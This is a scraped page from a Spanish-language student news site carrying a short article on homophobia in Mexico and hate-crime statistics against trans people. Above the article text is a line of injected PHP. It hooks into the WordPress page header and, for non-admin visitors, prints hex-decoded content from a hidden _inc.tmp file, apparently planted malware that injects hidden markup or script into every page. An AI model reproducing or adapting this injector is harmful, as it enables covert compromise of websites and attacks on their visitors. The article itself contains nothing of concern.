if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } MÉXICO, EL SEGUNDO PAÍS MÁS HOMOFÓBICO – La Opinión Universitaria La Opinión Universitaria
Menu

MÉXICO, EL SEGUNDO PAÍS MÁS HOMOFÓBICO

Por Carmen Ahide León M.

 

Sabías qué México es el segundo país más homofóbico, en el país se han realizado aproximadamente 1218 asesinatos en los últimos 19 años, así lo informó la Comisión Ciudadana contra los Crímenes por Odio y Homofobia.

 

El 96% de los crímenes que se han registrado son contra trans, travestis, transgéneros y transexuales. La edad promedio de estas victimas es, 18 a 29 años (261 victimas); 30 a 39 años (266 victimas); 40 a 49 años (170 victimas); 50 a 59 años (105 victimas) y 60 en adelante (74 victimas).

 

Los expertos creen que hay dos alternativas contra la homofobia en el país y que deben acompañar la aprobación de leyes igualitarias: campañas publicitarias y la inclusión del tema en los programas escolares, ya que es un tema tabú en la educación mexicana que tienen que romperse de algún modo y en algún momento.

  • No comments

    Deja una respuesta

    Tweets recientes